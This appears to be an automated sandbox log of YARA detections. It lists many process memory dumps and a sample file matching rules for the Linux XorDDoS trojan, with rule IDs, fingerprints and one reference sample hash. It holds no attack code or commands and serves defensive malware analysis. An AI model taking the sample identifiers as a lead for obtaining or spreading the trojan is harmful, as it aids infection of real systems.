Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6448.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6448.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6448.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6448.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6448.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6448.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6451.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6451.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6451.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6451.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6451.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6451.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6305.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6305.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6305.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6305.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6305.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6305.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6558.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6558.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6558.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6558.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6558.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6558.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6376.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6376.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6376.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6376.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6376.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6376.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6308.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6308.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6308.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6308.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6308.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6308.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen

Source: fuck.elf, type: SAMPLE	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: fuck.elf, type: SAMPLE	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: fuck.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: fuck.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
